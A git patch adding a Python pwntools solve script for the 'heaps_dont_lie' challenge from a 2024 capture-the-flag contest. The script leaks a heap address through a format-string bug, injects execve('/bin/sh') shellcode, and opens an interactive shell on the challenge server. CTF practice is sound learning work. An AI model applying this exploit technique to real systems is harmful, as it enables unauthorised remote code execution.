From 8709b54d81ef6823b451ad5990a677b5c64763e2 Mon Sep 17 00:00:00 2001
From: jc <jc@git.server>
Date: Mon, 18 Nov 2024 19:51:05 +0300
Subject: [PATCH] solve script

---
 p3rf3ctr00t_ctf_2024/heaps_dont_lie/a.py | 34 ++++++++++++++++++++++++
 1 file changed, 34 insertions(+)
 create mode 100644 p3rf3ctr00t_ctf_2024/heaps_dont_lie/a.py

diff --git a/p3rf3ctr00t_ctf_2024/heaps_dont_lie/a.py b/p3rf3ctr00t_ctf_2024/heaps_dont_lie/a.py
new file mode 100644
index 0000000..aadecd6
--- /dev/null
+++ b/p3rf3ctr00t_ctf_2024/heaps_dont_lie/a.py
@@ -0,0 +1,34 @@
+#!/usr/bin/python3
+
+from pwn import *
+import time
+
+context.binary = target = ELF("./heaps_dont_lie", checksec=False)
+# r = process()
+r = remote("94.72.112.248", 1244)
+
+# funcs
+s = lambda a: r.sendline(a)
+ss = lambda a: r.send(a)
+
+# leak
+buf = b"%7$p"
+s(buf)
+r.recvuntil(b"tune : ")
+heap = int(r.recvline().strip(), 16) + 0x850
+log.info("heap: %#x", heap)
+
+# sc
+sc = """
+lea rdi, [rdx+19]
+xor rsi, rsi
+xor rdx, rdx
+mov rax, 59
+syscall
+"""
+sc = asm(sc) + b"/bin/sh\0"
+sc += b"A"*(32-len(sc))
+sc += p64(heap)
+s(sc)
+
+r.interactive()
\ No newline at end of file